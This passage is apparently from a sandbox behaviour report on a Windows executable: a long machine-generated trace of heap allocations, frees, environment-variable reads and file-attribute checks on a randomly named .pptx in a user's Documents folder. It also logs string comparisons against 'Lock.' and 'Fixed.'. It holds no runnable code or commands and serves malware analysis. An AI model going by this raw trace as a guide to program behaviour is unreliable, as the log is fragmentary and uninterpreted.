hHeap=0x2af0000) returned 1 [0216.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0216.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0216.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0216.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0216.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0216.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0216.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0216.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0216.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0216.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0216.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0216.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0216.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0216.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0216.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0216.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0216.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0216.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0216.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x62) returned 0x29f7878 [0216.049] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/lmvGT20EAt7X97ts9.pptx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\lmvGT20EAt7X97ts9.pptx", lpFilePart=0x8cf650*="lmvGT20EAt7X97ts9.pptx") returned 0x30 [0216.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0216.049] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\lmvGT20EAt7X97ts9.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lmvgt20eat7x97ts9.pptx")) returned 0xffffffff [0216.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854b78 | out: hHeap=0x2af0000) returned 1 [0216.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0216.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0216.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0216.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0216.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0216.049] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0216.049] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.049] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0216.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0216.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0216.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0216.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0216.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0216.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0216.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0216.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0216.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0216.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0216.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0216.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0216.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mpp4LjR5L7", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0216.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pp4LjR5L7", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0216.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4LjR5L7", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0216.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4LjR5L7", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0216.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LjR5L7", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0216.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jR5L7", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0216.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0216.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0216.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0216.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0216.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0216.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0216.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0216.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0216.050] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0216.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0216.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0216.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0216.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0216.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0216.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0216.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0216.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0216.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0216.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0216.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0216.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0216.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0216.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0216.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0216.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0216.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0216.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6ee0 [0216.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0216.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mpp4LjR5L7", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0216.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pp4LjR5L7", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0216.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4LjR5L7", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0216.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4LjR5L7", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0216.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LjR5L7", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0216.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0216.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0216.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0216.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0216.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0216.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0216.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0216.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0216.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0216.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0216.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0216.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0216.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0216.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a736f0 | out: hHeap=0x2af0000) returned 1 [0216.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0216.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0216.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0216.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0216.052] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0216.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0216.052] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0216.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0216.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0216.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0216.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0216.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0216.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0216.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0216.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0216.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0216.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0216.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0216.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0216.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0216.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0216.052] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0216.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0216.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0216.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaea0 [0216.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0216.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0216.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0216.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0216.053] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0216.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0216.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0216.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0216.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0216.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0216.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0216.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0216.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0216.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0216.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0216.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0216.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0216.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0216.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0216.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0216.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0216.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854a10 [0216.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0216.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0216.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0216.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0216.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0216.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0216.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0216.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0216.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0216.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0216.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b38 [0216.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0216.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0216.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0216.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0216.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0216.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0216.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0216.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0216.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0216.055] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0216.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0216.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0216.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae70 [0216.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0216.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0216.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0b0 [0216.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0216.055] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0216.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0216.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0216.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0216.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0216.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0216.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0216.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0216.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0216.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0216.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0216.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0216.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0216.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0216.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0216.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0216.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0216.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854740 [0216.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0216.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0216.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0216.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0216.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0216.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0216.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0216.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0216.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0216.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b88 [0216.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0216.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0216.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0216.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0216.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0216.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0216.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab110 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0216.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0216.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0216.057] HeapFree (in: hHeap=0x2af0000, 